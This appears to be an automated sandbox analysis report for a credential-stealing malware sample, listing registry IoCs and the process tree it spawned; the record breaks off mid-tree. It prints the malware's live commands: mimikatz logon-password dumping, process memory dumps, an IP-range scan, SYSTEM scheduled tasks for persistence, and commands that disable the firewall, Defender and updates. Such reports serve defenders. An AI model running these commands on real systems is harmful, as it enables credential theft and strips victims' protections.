Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	mtlvznziz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	mtlvznziz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	mtlvznziz.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	mtlvznziz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ncnrnqz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	mtlvznziz.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	mtlvznziz.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	mtlvznziz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	mtlvznziz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	ncnrnqz.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	mtlvznziz.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	ncnrnqz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	mtlvznziz.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	ncnrnqz.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	mtlvznziz.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	mtlvznziz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	mtlvznziz.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	mtlvznziz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	mtlvznziz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	mtlvznziz.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	ncnrnqz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	mtlvznziz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	mtlvznziz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	mtlvznziz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	mtlvznziz.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	mtlvznziz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	mtlvznziz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	mtlvznziz.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	mtlvznziz.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	mtlvznziz.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	mtlvznziz.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	mtlvznziz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	mtlvznziz.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	mtlvznziz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	mtlvznziz.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	mtlvznziz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	mtlvznziz.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	mtlvznziz.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	mtlvznziz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	mtlvznziz.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	mtlvznziz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	mtlvznziz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	mtlvznziz.exe

Modifies registry class 14 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile"	ncnrnqz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\	ncnrnqz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\	ncnrnqz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\	ncnrnqz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile"	ncnrnqz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\	ncnrnqz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile"	ncnrnqz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile"	ncnrnqz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\	ncnrnqz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile"	ncnrnqz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile"	ncnrnqz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\	ncnrnqz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\	ncnrnqz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile"	ncnrnqz.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4996	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe

Suspicious behavior: LoadsDriver 15 IoCs

pid	Process
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
4740	2024-05-28_03d0de4cda4efd31f762aadf487b7aec_hacktools_icedid_mimikatz.exe

Suspicious use of AdjustPrivilegeToken 26 IoCs

description	pid	Process
Token: SeDebugPrivilege	4740	2024-05-28_03d0de4cda4efd31f762aadf487b7aec_hacktools_icedid_mimikatz.exe
Token: SeDebugPrivilege	4576	ncnrnqz.exe
Token: SeDebugPrivilege	2524	ncnrnqz.exe
Token: SeDebugPrivilege	3016	vfshost.exe
Token: SeDebugPrivilege	3340	mtlvznziz.exe
Token: SeLockMemoryPrivilege	4168	jrvvrz.exe
Token: SeLockMemoryPrivilege	4168	jrvvrz.exe
Token: SeDebugPrivilege	2416	mtlvznziz.exe
Token: SeDebugPrivilege	4156	mtlvznziz.exe
Token: SeDebugPrivilege	2296	mtlvznziz.exe
Token: SeDebugPrivilege	4256	mtlvznziz.exe
Token: SeDebugPrivilege	3584	mtlvznziz.exe
Token: SeDebugPrivilege	4428	mtlvznziz.exe
Token: SeDebugPrivilege	3064	mtlvznziz.exe
Token: SeDebugPrivilege	4892	mtlvznziz.exe
Token: SeDebugPrivilege	1056	mtlvznziz.exe
Token: SeDebugPrivilege	4532	mtlvznziz.exe
Token: SeDebugPrivilege	3228	mtlvznziz.exe
Token: SeDebugPrivilege	4052	mtlvznziz.exe
Token: SeDebugPrivilege	2704	mtlvznziz.exe
Token: SeDebugPrivilege	3028	mtlvznziz.exe
Token: SeDebugPrivilege	4260	mtlvznziz.exe
Token: SeDebugPrivilege	4776	mtlvznziz.exe
Token: SeDebugPrivilege	4728	mtlvznziz.exe
Token: SeDebugPrivilege	6344	mtlvznziz.exe
Token: SeDebugPrivilege	3324	mtlvznziz.exe

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
4740	2024-05-28_03d0de4cda4efd31f762aadf487b7aec_hacktools_icedid_mimikatz.exe
4740	2024-05-28_03d0de4cda4efd31f762aadf487b7aec_hacktools_icedid_mimikatz.exe
4576	ncnrnqz.exe
4576	ncnrnqz.exe
2524	ncnrnqz.exe
2524	ncnrnqz.exe
3792	xohudmc.exe
2008	yqiwma.exe
4620	ncnrnqz.exe
4620	ncnrnqz.exe
6356	ncnrnqz.exe
6356	ncnrnqz.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4740 wrote to memory of 4784	4740	2024-05-28_03d0de4cda4efd31f762aadf487b7aec_hacktools_icedid_mimikatz.exe	90
PID 4740 wrote to memory of 4784	4740	2024-05-28_03d0de4cda4efd31f762aadf487b7aec_hacktools_icedid_mimikatz.exe	90
PID 4740 wrote to memory of 4784	4740	2024-05-28_03d0de4cda4efd31f762aadf487b7aec_hacktools_icedid_mimikatz.exe	90
PID 4784 wrote to memory of 4996	4784	cmd.exe	92
PID 4784 wrote to memory of 4996	4784	cmd.exe	92
PID 4784 wrote to memory of 4996	4784	cmd.exe	92
PID 4784 wrote to memory of 4576	4784	cmd.exe	104
PID 4784 wrote to memory of 4576	4784	cmd.exe	104
PID 4784 wrote to memory of 4576	4784	cmd.exe	104
PID 2524 wrote to memory of 4960	2524	ncnrnqz.exe	106
PID 2524 wrote to memory of 4960	2524	ncnrnqz.exe	106
PID 2524 wrote to memory of 4960	2524	ncnrnqz.exe	106
PID 4960 wrote to memory of 4516	4960	cmd.exe	108
PID 4960 wrote to memory of 4516	4960	cmd.exe	108
PID 4960 wrote to memory of 4516	4960	cmd.exe	108
PID 4960 wrote to memory of 4260	4960	cmd.exe	109
PID 4960 wrote to memory of 4260	4960	cmd.exe	109
PID 4960 wrote to memory of 4260	4960	cmd.exe	109
PID 4960 wrote to memory of 1004	4960	cmd.exe	110
PID 4960 wrote to memory of 1004	4960	cmd.exe	110
PID 4960 wrote to memory of 1004	4960	cmd.exe	110
PID 4960 wrote to memory of 4356	4960	cmd.exe	111
PID 4960 wrote to memory of 4356	4960	cmd.exe	111
PID 4960 wrote to memory of 4356	4960	cmd.exe	111
PID 4960 wrote to memory of 1660	4960	cmd.exe	112
PID 4960 wrote to memory of 1660	4960	cmd.exe	112
PID 4960 wrote to memory of 1660	4960	cmd.exe	112
PID 4960 wrote to memory of 1488	4960	cmd.exe	113
PID 4960 wrote to memory of 1488	4960	cmd.exe	113
PID 4960 wrote to memory of 1488	4960	cmd.exe	113
PID 2524 wrote to memory of 4740	2524	ncnrnqz.exe	114
PID 2524 wrote to memory of 4740	2524	ncnrnqz.exe	114
PID 2524 wrote to memory of 4740	2524	ncnrnqz.exe	114
PID 2524 wrote to memory of 4052	2524	ncnrnqz.exe	116
PID 2524 wrote to memory of 4052	2524	ncnrnqz.exe	116
PID 2524 wrote to memory of 4052	2524	ncnrnqz.exe	116
PID 2524 wrote to memory of 1140	2524	ncnrnqz.exe	118
PID 2524 wrote to memory of 1140	2524	ncnrnqz.exe	118
PID 2524 wrote to memory of 1140	2524	ncnrnqz.exe	118
PID 2524 wrote to memory of 1084	2524	ncnrnqz.exe	124
PID 2524 wrote to memory of 1084	2524	ncnrnqz.exe	124
PID 2524 wrote to memory of 1084	2524	ncnrnqz.exe	124
PID 1084 wrote to memory of 3016	1084	cmd.exe	126
PID 1084 wrote to memory of 3016	1084	cmd.exe	126
PID 1084 wrote to memory of 3016	1084	cmd.exe	126
PID 3016 wrote to memory of 4020	3016	wpcap.exe	127
PID 3016 wrote to memory of 4020	3016	wpcap.exe	127
PID 3016 wrote to memory of 4020	3016	wpcap.exe	127
PID 4020 wrote to memory of 5028	4020	net.exe	129
PID 4020 wrote to memory of 5028	4020	net.exe	129
PID 4020 wrote to memory of 5028	4020	net.exe	129
PID 3016 wrote to memory of 840	3016	wpcap.exe	130
PID 3016 wrote to memory of 840	3016	wpcap.exe	130
PID 3016 wrote to memory of 840	3016	wpcap.exe	130
PID 840 wrote to memory of 4704	840	net.exe	132
PID 840 wrote to memory of 4704	840	net.exe	132
PID 840 wrote to memory of 4704	840	net.exe	132
PID 3016 wrote to memory of 4324	3016	wpcap.exe	133
PID 3016 wrote to memory of 4324	3016	wpcap.exe	133
PID 3016 wrote to memory of 4324	3016	wpcap.exe	133
PID 4324 wrote to memory of 2968	4324	net.exe	135
PID 4324 wrote to memory of 2968	4324	net.exe	135
PID 4324 wrote to memory of 2968	4324	net.exe	135
PID 3016 wrote to memory of 1416	3016	wpcap.exe	136

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2140
- C:\Windows\TEMP\pmrlgkemu\jrvvrz.exe
  "C:\Windows\TEMP\pmrlgkemu\jrvvrz.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4168

C:\Users\Admin\AppData\Local\Temp\2024-05-28_03d0de4cda4efd31f762aadf487b7aec_hacktools_icedid_mimikatz.exe
"C:\Users\Admin\AppData\Local\Temp\2024-05-28_03d0de4cda4efd31f762aadf487b7aec_hacktools_icedid_mimikatz.exe"
1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4740
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\kvialcmr\ncnrnqz.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4784
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1 -n 5
    3⤵
    - Runs ping.exe
    PID:4996
- - C:\Windows\kvialcmr\ncnrnqz.exe
    C:\Windows\kvialcmr\ncnrnqz.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:4576

C:\Windows\kvialcmr\ncnrnqz.exe
C:\Windows\kvialcmr\ncnrnqz.exe
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Sets file execution options in registry
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2524
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4960
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4516
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    PID:4260
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1004
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    PID:4356
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1660
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    PID:1488
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static del all
  2⤵
  PID:4740
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add policy name=Bastards description=FuckingBastards
  2⤵
  PID:4052
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filteraction name=BastardsList action=block
  2⤵
  PID:1140
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\ctvlnlili\rzvrtrlue\wpcap.exe /S
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1084
- - C:\Windows\ctvlnlili\rzvrtrlue\wpcap.exe
    C:\Windows\ctvlnlili\rzvrtrlue\wpcap.exe /S
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - Suspicious use of WriteProcessMemory
    PID:3016
  - - C:\Windows\SysWOW64\net.exe
      net stop "Boundary Meter"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4020
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Boundary Meter"
        5⤵
        
        PID:5028
  - - C:\Windows\SysWOW64\net.exe
      net stop "TrueSight Meter"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:840
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "TrueSight Meter"
        5⤵
        
        PID:4704
  - - C:\Windows\SysWOW64\net.exe
      net stop npf
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4324
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop npf
        5⤵
        
        PID:2968
  - - C:\Windows\SysWOW64\net.exe
      net start npf
      4⤵
      PID:1416
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start npf
        5⤵
        
        PID:3980
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  PID:4776
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    PID:1816
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      PID:4940
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  PID:2572
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    PID:1520
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      PID:4128
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\ctvlnlili\rzvrtrlue\illedyzmr.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ctvlnlili\rzvrtrlue\Scant.txt
  2⤵
  PID:4348
- - C:\Windows\ctvlnlili\rzvrtrlue\illedyzmr.exe
    C:\Windows\ctvlnlili\rzvrtrlue\illedyzmr.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ctvlnlili\rzvrtrlue\Scant.txt
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1924
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\ctvlnlili\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\ctvlnlili\Corporate\log.txt
  2⤵
  - Drops file in Windows directory
  PID:2416
- - C:\Windows\ctvlnlili\Corporate\vfshost.exe
    C:\Windows\ctvlnlili\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:3016
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "sviaigimi" /ru system /tr "cmd /c C:\Windows\ime\ncnrnqz.exe"
  2⤵
  PID:4520
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4576
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "sviaigimi" /ru system /tr "cmd /c C:\Windows\ime\ncnrnqz.exe"
    3⤵
    - Creates scheduled task(s)
    PID:3040
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "lcerrlzzb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\kvialcmr\ncnrnqz.exe /p everyone:F"
  2⤵
  PID:664
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2320
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "lcerrlzzb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\kvialcmr\ncnrnqz.exe /p everyone:F"
    3⤵
    - Creates scheduled task(s)
    PID:3372
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "krzieamit" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\pmrlgkemu\jrvvrz.exe /p everyone:F"
  2⤵
  PID:3472
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2160
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "krzieamit" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\pmrlgkemu\jrvvrz.exe /p everyone:F"
    3⤵
    - Creates scheduled task(s)
    PID:4456
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
  2⤵
  PID:1080
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
  2⤵
  PID:3204
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  PID:1984
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  PID:4740
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
  2⤵
  PID:3292
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
  2⤵
  PID:3260
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  PID:4784
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  PID:4312
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
  2⤵
  PID:1552
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
  2⤵
  PID:3284
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  PID:3592
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  PID:2608
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop SharedAccess
  2⤵
  PID:424
- - C:\Windows\SysWOW64\net.exe
    net stop SharedAccess
    3⤵
    PID:4324
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SharedAccess
      4⤵
      PID:4752
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh firewall set opmode mode=disable
  2⤵
  PID:840
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall set opmode mode=disable
    3⤵
    - Modifies Windows Firewall
    PID:2316
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh Advfirewall set allprofiles state off
  2⤵
  PID:4364
- - C:\Windows\SysWOW64\netsh.exe
    netsh Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:4128
- C:\Windows\TEMP\ctvlnlili\mtlvznziz.exe
  C:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 792 C:\Windows\TEMP\ctvlnlili\792.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3340
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop MpsSvc
  2⤵
  PID:4300
- - C:\Windows\SysWOW64\net.exe
    net stop MpsSvc
    3⤵
    PID:1884
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MpsSvc
      4⤵
      PID:2340
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop WinDefend
  2⤵
  PID:4648
- - C:\Windows\SysWOW64\net.exe
    net stop WinDefend
    3⤵
    PID:1488
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop WinDefend
      4⤵
      PID:4272
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop wuauserv
  2⤵
  PID:4784
- - C:\Windows\SysWOW64\net.exe
    net stop wuauserv
    3⤵
    PID:4552
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop wuauserv
      4⤵
      PID:2808
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config MpsSvc start= disabled
  2⤵
  PID:4456
- - C:\Windows\SysWOW64\sc.exe
    sc config MpsSvc start= disabled
    3⤵
    - Launches sc.exe
    PID:4700
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config SharedAccess start= disabled
  2⤵
  PID:1660
- - C:\Windows\SysWOW64\sc.exe
    sc config SharedAccess start= disabled
    3⤵
    - Launches sc.exe
    PID:4352
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config WinDefend start= disabled
  2⤵
  PID:2196
- - C:\Windows\SysWOW64\sc.exe
    sc config WinDefend start= disabled
    3⤵
    - Launches sc.exe
    PID:1540
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config wuauserv start= disabled
  2⤵
  PID:2160
- - C:\Windows\SysWOW64\sc.exe
    sc config wuauserv start= disabled
    3⤵
    - Launches sc.exe
    PID:1924
- C:\Windows\TEMP\xohudmc.exe
  C:\Windows\TEMP\xohudmc.exe
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of SetWindowsHookEx
  PID:3792
- C:\Windows\TEMP\ctvlnlili\mtlvznziz.exe
  C:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 332 C:\Windows\TEMP\ctvlnlili\332.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2416
- C:\Windows\TEMP\ctvlnlili\mtlvznziz.exe
  C:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 2140 C:\Windows\TEMP\ctvlnlili\2140.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4156
- C:\Windows\TEMP\ctvlnlili\mtlvznziz.exe
  C:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 2552 C:\Windows\TEMP\ctvlnlili\2552.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2296
- C:\Windows\TEMP\ctvlnlili\mtlvznziz.exe
